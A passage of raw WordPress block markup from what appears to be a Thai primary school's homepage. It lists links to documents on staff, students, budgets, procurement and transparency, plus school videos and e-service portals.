href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a 